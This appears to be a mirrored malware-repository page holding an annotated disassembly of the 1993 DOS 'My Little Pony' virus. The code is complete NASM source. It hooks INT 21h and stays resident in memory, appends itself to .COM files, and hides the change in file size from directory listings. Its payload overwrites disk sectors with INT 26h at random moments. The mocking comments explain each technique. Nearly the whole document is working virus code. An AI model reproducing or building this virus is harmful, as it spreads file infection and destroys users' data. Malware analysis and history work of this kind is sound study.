mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-22 01:58:51 +00:00
4b9382ddbc
push
778 lines
15 KiB
NASM
778 lines
15 KiB
NASM
;My Little Pony v1.00 disassembly - sort of.
|
|
;By Cruel Entity of ANOI. Related to CyberCide.
|
|
|
|
;Well, the comments are a bit bitchy, probably coz I was in a really
|
|
;really bad mood when I wrote them. The virus author, Cruel Entity,
|
|
;knows how to make a nice virus, he just doesn't have enough assembly
|
|
;experience to make something really worth while, imho of course.
|
|
|
|
;Bummer: Still some loc_xxx's left, hrmpf, I won't care if you don't.
|
|
|
|
;Just dump this one in your misc. garbage area dude.. :-)
|
|
|
|
.model tiny
|
|
|
|
.code
|
|
|
|
org 100h
|
|
|
|
start:
|
|
call get_relative
|
|
get_relative:
|
|
pop bp
|
|
|
|
mov ax,0DD22h
|
|
int 21h ;Installation check.
|
|
cmp ax,3D33h
|
|
jne not_installed
|
|
|
|
;* lea dx, [bp+restore_carrier-get_relative]
|
|
db 08dh, 56h, 52h
|
|
|
|
jmp dx
|
|
|
|
not_installed:
|
|
mov ax,3521h
|
|
int 21h ;Get int21 vector
|
|
|
|
mov [bp+int21offset-get_relative],bx
|
|
mov [bp+int21seg-get_relative],es ;Store it.
|
|
|
|
mov ax,cs
|
|
dec ax
|
|
mov es,ax ;ES:0 points to MCB.
|
|
|
|
mov ax,es:[3]
|
|
sub ax,[bp+parasize-get_relative]
|
|
mov es:[3],ax ;Shrink blocksize.
|
|
|
|
mov ax,[bp+parasize-get_relative]
|
|
sub es:[12h],ax ;Free top mem.
|
|
|
|
mov es,es:[12h]
|
|
push es
|
|
lea si,[bp-3] ;SI points to start of
|
|
;virus.
|
|
mov di,100h
|
|
mov cx,[bp+virussize-get_relative]
|
|
rep movsb ;Copy virus up there.
|
|
|
|
pop ds
|
|
|
|
mov ax,2521h
|
|
mov dx, offset int21
|
|
int 21h ;Set new int21 vector.
|
|
|
|
restore_carrier:
|
|
push cs
|
|
push cs
|
|
pop ds
|
|
pop es
|
|
lea si,[bp+restore_bytes-get_relative]
|
|
mov cx,3
|
|
mov di,100h
|
|
rep movsb ;Restore host.
|
|
sub di,3
|
|
jmp di ;Restart host.
|
|
|
|
db 'Simple Simon met a pieman going to the fair said Simple Simon to '
|
|
db 'the pieman let me take your ware'
|
|
|
|
activate:
|
|
cmp dh,0 ;Seconds 0?
|
|
jne no_activate
|
|
cmp dl,5 ;Hundredth's less than 5?
|
|
ja no_activate
|
|
|
|
pushf
|
|
push bx
|
|
call get_random
|
|
|
|
mov cx,0Ah
|
|
xor dx,dx
|
|
div cx
|
|
mov dx,ax
|
|
mov al,2
|
|
mov cx,1
|
|
mov bx,offset anoi
|
|
kill_sector:
|
|
int 26h ;Sector write.
|
|
|
|
popf
|
|
inc al
|
|
|
|
cmp al, 25
|
|
jne kill_sector
|
|
|
|
pop bx
|
|
popf
|
|
jmp short no_activate
|
|
|
|
db '(c)1993 Cruel Entity'
|
|
|
|
int21:
|
|
pushf
|
|
cmp ax, 0dd22h
|
|
jz inst_chk
|
|
cmp ah,11h
|
|
jz fcb_stealth
|
|
cmp ah,12h
|
|
jz fcb_stealth
|
|
cmp ah,4eh
|
|
jz go_handle_stealth
|
|
cmp ah,4fh
|
|
jz go_handle_stealth
|
|
cmp ah,3dh
|
|
jz go_file_open
|
|
cmp ah,3eh
|
|
jz go_file_close
|
|
cmp ah,2ch
|
|
jz get_time
|
|
|
|
push ax
|
|
push cx
|
|
push dx
|
|
mov ah, 2ch ;Get DOS time.
|
|
int 21h
|
|
|
|
cmp cl,0
|
|
jz activate
|
|
|
|
no_activate:
|
|
pop dx
|
|
pop cx
|
|
pop ax
|
|
|
|
get_time:
|
|
cmp ah,36h
|
|
jne _pass_int
|
|
|
|
push bp
|
|
mov bp,offset loc_20
|
|
jmp bp
|
|
_pass_int:
|
|
popf ; Pop flags
|
|
pass_int:
|
|
db 0eah
|
|
int21offset dw 0
|
|
int21seg dw 0
|
|
|
|
go_handle_stealth:
|
|
push bp
|
|
mov bp,offset handle_stealth
|
|
jmp bp
|
|
|
|
go_file_open:
|
|
push bp
|
|
mov bp,offset file_open
|
|
jmp bp
|
|
go_file_close:
|
|
push bp
|
|
mov bp,offset file_close
|
|
jmp bp
|
|
|
|
inst_chk:
|
|
popf
|
|
mov ax,3D33h
|
|
iret
|
|
|
|
call_dos:
|
|
jmp dword ptr cs:[int21offset]
|
|
db 0C3h
|
|
|
|
fcb_stealth:
|
|
popf
|
|
pushf
|
|
|
|
push cs
|
|
call call_dos ;First let's see what
|
|
;DOS has to say..
|
|
|
|
cmp al,0FFh ;0FFH indicates
|
|
;no match found
|
|
je exit_fcb_stealth
|
|
match_found:
|
|
pushf
|
|
push ax
|
|
push bx
|
|
push cx
|
|
push dx
|
|
push si
|
|
push di
|
|
push ds
|
|
push es
|
|
push bp ;Push the lot.
|
|
|
|
mov ah,2Fh
|
|
int 21h ;Get DTA
|
|
|
|
push es
|
|
pop ds ;DS:BX points to DTA.
|
|
|
|
mov si,bx ;DS:SI points to DTA.
|
|
|
|
add si,10h ;SI points to extension.
|
|
;<EXTENDED FCB ONLY!>
|
|
|
|
;(lamer)
|
|
|
|
lodsw
|
|
cmp ax,'OC' ;Extension starts with CO?
|
|
jne no_fcb_stealth
|
|
|
|
lodsb
|
|
cmp al,'M' ;Last char M?
|
|
jne no_fcb_stealth
|
|
|
|
mov si,bx
|
|
add si,26h ;I don't mean to sound
|
|
;bitchy, but IMO,
|
|
;ADD SI, 13h would've
|
|
;been what normal persons
|
|
;would've done.
|
|
|
|
;Offset 26h is a reserved
|
|
;position within an
|
|
;extended FCB.
|
|
|
|
;<INFECTION MARK>
|
|
|
|
lodsw
|
|
cmp ax,0 ;OR AX,AX? Naaaah!
|
|
jne no_fcb_stealth
|
|
|
|
mov si,bx
|
|
add si,1Eh ;offset 1eh is the high
|
|
;byte of file time.
|
|
lodsw
|
|
and al,1Fh
|
|
cmp al,0Ah
|
|
je proceed_fcb_stealth
|
|
|
|
mov dx,offset loc_17
|
|
jmp dx
|
|
proceed_fcb_stealth:
|
|
mov si,bx
|
|
add si,24h ;If I remember correctly,
|
|
;this is an undocumented
|
|
;copy of the filesize within
|
|
;the FCB structure. THIS
|
|
;is the value that is
|
|
;printed in a dir listing.
|
|
|
|
mov di,si
|
|
lodsw
|
|
sub ax,cs:virussize ;Hm, I can't seem to figure
|
|
jz no_fcb_stealth ;out if this guy is just
|
|
stosw ;stupid or ignorant when it
|
|
;comes to asm.
|
|
no_fcb_stealth:
|
|
pop bp
|
|
pop es
|
|
pop ds
|
|
pop di
|
|
pop si
|
|
pop dx
|
|
pop cx
|
|
pop bx
|
|
pop ax
|
|
popf
|
|
|
|
exit_fcb_stealth:
|
|
retf 2
|
|
|
|
db '%%% MY LITTLE PONY %%% '
|
|
db 'COPYRIGHT(C) 1993 A.N.O.I. %%%'
|
|
|
|
loc_17:
|
|
mov si,bx
|
|
add si,8
|
|
push cs
|
|
pop es
|
|
mov cx,0Ah
|
|
mov di,offset something
|
|
|
|
locloop_18:
|
|
cmp byte ptr es:[di],' '
|
|
je loc_19
|
|
add di,8
|
|
loop locloop_18
|
|
|
|
jmp short no_fcb_stealth
|
|
loc_19:
|
|
mov cx,8
|
|
rep movsb
|
|
jmp short no_fcb_stealth
|
|
|
|
loc_20:
|
|
pop bp
|
|
push ax
|
|
push bx
|
|
push cx
|
|
push dx
|
|
push si
|
|
push di
|
|
push ds
|
|
push es
|
|
push bp ;Push some regs.
|
|
|
|
push cs
|
|
push cs
|
|
pop ds
|
|
pop es
|
|
|
|
mov di,offset something
|
|
mov cx,0Ah
|
|
|
|
locloop_21:
|
|
cmp byte ptr [di],' '
|
|
je loc_22
|
|
push di
|
|
push cx
|
|
mov si,di
|
|
call try_infect
|
|
pop cx
|
|
pop di
|
|
add di,8
|
|
loop locloop_21
|
|
|
|
loc_22:
|
|
push cs
|
|
pop es
|
|
mov di,offset something
|
|
mov cx,5Ch
|
|
mov al,' '
|
|
rep stosb
|
|
pop bp
|
|
pop es
|
|
pop ds
|
|
pop di
|
|
pop si
|
|
pop dx
|
|
pop cx
|
|
pop bx
|
|
pop ax
|
|
popf
|
|
jmp pass_int
|
|
|
|
try_infect: ;JESUS! It's actually
|
|
;a subroutine!!
|
|
|
|
;He knows what a sub
|
|
;IS!! Wow! I'm shocked!
|
|
mov di,offset filename
|
|
mov cx,8
|
|
|
|
copyloop2:
|
|
lodsb
|
|
cmp al,' '
|
|
je endcopy2
|
|
stosb
|
|
loop copyloop2
|
|
endcopy2:
|
|
|
|
mov al,'.'
|
|
stosb
|
|
mov al,'C'
|
|
stosb
|
|
mov al,'O'
|
|
stosb
|
|
mov al,'M'
|
|
stosb
|
|
mov al,0
|
|
stosb
|
|
|
|
push cs
|
|
pop ds
|
|
|
|
mov ax,4300h
|
|
mov dx,offset filename
|
|
int 21h ;Get attributes.
|
|
|
|
jnc got_attributes
|
|
retn
|
|
got_attributes:
|
|
push cx
|
|
xor cx,cx
|
|
mov ax,4301h
|
|
int 21h ;Zoink attributes.
|
|
|
|
mov ax,3D02h
|
|
mov dx,609h
|
|
pushf ;Open file in read/write mode.
|
|
|
|
push cs
|
|
call call_dos
|
|
|
|
mov bx,ax ;Handle to BX
|
|
|
|
mov ax,5700h
|
|
int 21h ;Get file date/time.
|
|
|
|
push dx
|
|
push cx
|
|
and cl,1Fh
|
|
cmp cl,0Ah
|
|
jne continue_infect
|
|
|
|
mov dx,offset exit_infect
|
|
jmp dx
|
|
continue_infect:
|
|
mov ah,3Fh
|
|
mov cx,3
|
|
mov dx,offset restore_bytes
|
|
int 21h ;Read first three bytes.
|
|
|
|
mov ax,4202h
|
|
xor dx,dx
|
|
xor cx,cx
|
|
int 21h ;Seek to EOF
|
|
|
|
sub ax,3
|
|
|
|
mov jmp_data,ax
|
|
mov ah,40h
|
|
mov dx,100h
|
|
mov cx,virussize
|
|
int 21h ;Append virus to file.
|
|
|
|
mov ax,4200h
|
|
xor dx,dx
|
|
xor cx,cx
|
|
int 21h ;Seek to start.
|
|
|
|
mov ah,40h
|
|
mov cx,3
|
|
mov dx,offset jmp_op
|
|
int 21h ;Overwrite with JMP
|
|
|
|
exit_infect:
|
|
pop cx
|
|
pop dx
|
|
and cl,0E0h
|
|
or cl,0Ah
|
|
mov ax,5701h
|
|
int 21h ;Givvit the special date/time
|
|
;already-infected type
|
|
;designation treatment..
|
|
|
|
|
|
mov ah,3Eh
|
|
pushf
|
|
push cs
|
|
call call_dos ;CL00000000SE 'r up!
|
|
|
|
mov ax,4301h
|
|
mov dx,offset filename
|
|
pop cx
|
|
int 21h ;Restore kuhl attribs..
|
|
|
|
ret
|
|
|
|
handle_stealth:
|
|
pop bp
|
|
popf
|
|
pushf
|
|
push cs
|
|
call call_dos
|
|
jnc handle_match_found
|
|
retf 2
|
|
handle_match_found:
|
|
pushf
|
|
push ax
|
|
push bx
|
|
push cx
|
|
push dx
|
|
push si
|
|
push di
|
|
push ds
|
|
push es
|
|
push bp ;Push the lot.
|
|
mov ah,2Fh
|
|
int 21h ;Get DTA
|
|
|
|
push es
|
|
pop ds ;DS:BX points to DTA.
|
|
mov si,bx ;DS:SI points to DTA.
|
|
|
|
push cs
|
|
pop es
|
|
|
|
add si,1Eh ;1eh is start of filename
|
|
;within the DTA struct.
|
|
mov di,offset filename
|
|
mov cx,25
|
|
|
|
copyloop:
|
|
lodsb
|
|
cmp al,0
|
|
je end_copy ;Copy filename to buffer.
|
|
stosb
|
|
loop copyloop
|
|
|
|
end_copy:
|
|
mov al,0
|
|
stosb ;Make it a valid ASCIIZ
|
|
;string.
|
|
push ds
|
|
pop es
|
|
push cs
|
|
pop ds
|
|
|
|
mov si,di
|
|
sub si,4 ;Assume extension is three
|
|
;characters.
|
|
|
|
lodsw
|
|
cmp ax,'OC'
|
|
je starts_with_co
|
|
cmp ax,'oc'
|
|
jne no_handle_stealth
|
|
starts_with_co:
|
|
lodsb
|
|
cmp al,'m'
|
|
je com_file
|
|
cmp al,'M'
|
|
jne no_handle_stealth
|
|
com_file:
|
|
push es
|
|
pop ds
|
|
mov si,bx
|
|
add si,1Ch ;High word of filesize.
|
|
lodsw
|
|
cmp ax,0 ;COM file -> not bigger
|
|
;than 64 kb -> highword
|
|
;=0. Just an additional
|
|
;check. but OR AX,AX?
|
|
;Cuz n0t!
|
|
jne no_handle_stealth
|
|
|
|
mov si,bx
|
|
add si,16h ;File time.
|
|
lodsw
|
|
and al,1Fh
|
|
cmp al,0Ah
|
|
jne no_handle_stealth
|
|
|
|
mov si,bx
|
|
add si,1Ah ;Low word of filesize.
|
|
|
|
mov di,si
|
|
lodsw
|
|
sub ax,cs:virussize
|
|
jz no_handle_stealth
|
|
stosw
|
|
no_handle_stealth:
|
|
pop bp
|
|
pop es
|
|
pop ds
|
|
pop di
|
|
pop si
|
|
pop dx
|
|
pop cx
|
|
pop bx
|
|
pop ax
|
|
popf
|
|
retf 2
|
|
|
|
file_open:
|
|
pop bp
|
|
push ax
|
|
push bx
|
|
push cx
|
|
push dx
|
|
push si
|
|
push di
|
|
push bp
|
|
push ds
|
|
push es ;Save some regs.
|
|
|
|
mov al,'.'
|
|
push ds
|
|
pop es
|
|
mov di,dx ;ES:DI points to filename.
|
|
|
|
mov cx,32h
|
|
repne scasb ;Scan for '.'
|
|
mov si,di
|
|
lodsw
|
|
cmp ax,'OC'
|
|
je pffff_this_is_boring
|
|
cmp ax,'oc'
|
|
je pffff_this_is_boring
|
|
|
|
mov dx,offset exit_disinfect
|
|
jmp dx
|
|
|
|
pffff_this_is_boring:
|
|
lodsb
|
|
cmp al,'m'
|
|
je try_disinfect
|
|
cmp al,'M'
|
|
jne exit_disinfect
|
|
try_disinfect:
|
|
mov ax,3D02h
|
|
pushf
|
|
push cs
|
|
call call_dos ;Open file in read/write
|
|
;mode.
|
|
jc exit_disinfect
|
|
|
|
mov bx,ax ;Handle to BX.
|
|
|
|
push cs
|
|
pop ds
|
|
push cs
|
|
pop es
|
|
mov ax,5700h
|
|
int 21h ;Get file date/time.
|
|
|
|
and cl,1Fh
|
|
cmp cl,0Ah
|
|
jne exit_disinfect
|
|
mov ax,4202h
|
|
xor dx,dx
|
|
xor cx,cx ;CWD? naaaaaaaah!
|
|
int 21h ;Seek to EOF
|
|
|
|
push ax
|
|
sub ax,3 ;Filesize-3
|
|
mov dx,ax
|
|
mov ax,4200h
|
|
mov cx,0
|
|
int 21h ;Seek to EOF-3.
|
|
|
|
mov ah,3Fh
|
|
mov cx,3
|
|
mov dx,offset buf
|
|
int 21h
|
|
|
|
mov ax,4200h
|
|
xor cx,cx
|
|
xor dx,dx ;Boooooriiing.
|
|
int 21h ;Seek to BOF BOF BOF.
|
|
|
|
mov ah,40h
|
|
mov cx,3
|
|
mov dx,offset buf
|
|
int 21h
|
|
|
|
pop dx
|
|
sub dx,virussize
|
|
mov ax,4200h
|
|
mov cx,0
|
|
int 21h ;Seek to EOF-virussize.
|
|
|
|
mov ah,40h
|
|
mov cx,0
|
|
int 21h ;Truncate file.
|
|
|
|
mov ah,3Eh
|
|
pushf
|
|
push cs
|
|
call call_dos ;close file.
|
|
exit_disinfect:
|
|
pop es
|
|
pop ds
|
|
pop bp
|
|
pop di
|
|
pop si
|
|
pop dx
|
|
pop cx
|
|
pop bx
|
|
pop ax
|
|
popf
|
|
pushf
|
|
push cs
|
|
call call_dos
|
|
retf 2
|
|
|
|
file_close:
|
|
pop bp
|
|
push ax
|
|
push bx
|
|
push cx
|
|
push dx
|
|
push si
|
|
push di
|
|
push bp
|
|
push ds
|
|
push es ;Hmpf. I suppose nobody
|
|
;knows what subroutines
|
|
;are these days..
|
|
|
|
mov ax,1220h
|
|
int 2Fh
|
|
mov bl,es:[di]
|
|
mov ax,1216h
|
|
int 2Fh ;Awright, grabbed SFT ptr.
|
|
|
|
mov bp,di
|
|
add di,28h ;File extension.
|
|
|
|
push es
|
|
pop ds
|
|
mov si,di
|
|
lodsw
|
|
cmp ax,'OC' ;AAARRRGGHh wibble wibble!
|
|
;I can't take much more
|
|
;of diiizzzzzzzzzzzz..
|
|
jne exit_disinfect
|
|
lodsb
|
|
cmp al,'M'
|
|
jne exit_disinfect
|
|
|
|
mov si,bp
|
|
add si,20h ;Filename.
|
|
push cs
|
|
pop es
|
|
call try_infect ;HUUUH? A SUBROUTINE?
|
|
jmp short exit_disinfect
|
|
|
|
get_random:
|
|
push dx
|
|
push cx
|
|
push bx
|
|
in al,40h ;Timer data.
|
|
add ax,0
|
|
mov dx,0
|
|
mov cx,7
|
|
|
|
randomloop:
|
|
shl ax,1 ; Shift w/zeros fill
|
|
rcl dx,1 ; Rotate thru carry
|
|
mov bl,al
|
|
xor bl,dh
|
|
jns no_sign
|
|
inc al
|
|
no_sign:
|
|
loop randomloop
|
|
|
|
pop bx
|
|
mov al,dl
|
|
pop cx
|
|
pop dx
|
|
retn
|
|
|
|
anoi db '>>> A.N.O.I <<<'
|
|
|
|
buf db 3 dup (0)
|
|
|
|
virussize dw (endvirus-start)
|
|
|
|
parasize dw 'd'
|
|
|
|
something db ' '
|
|
db ' '
|
|
db ' '
|
|
|
|
filename db 12 dup (0)
|
|
|
|
jmp_op db 0E9h
|
|
jmp_data dw 0
|
|
restore_bytes db 90h
|
|
db 0CDh, 20h
|
|
endvirus:
|
|
|
|
end start
|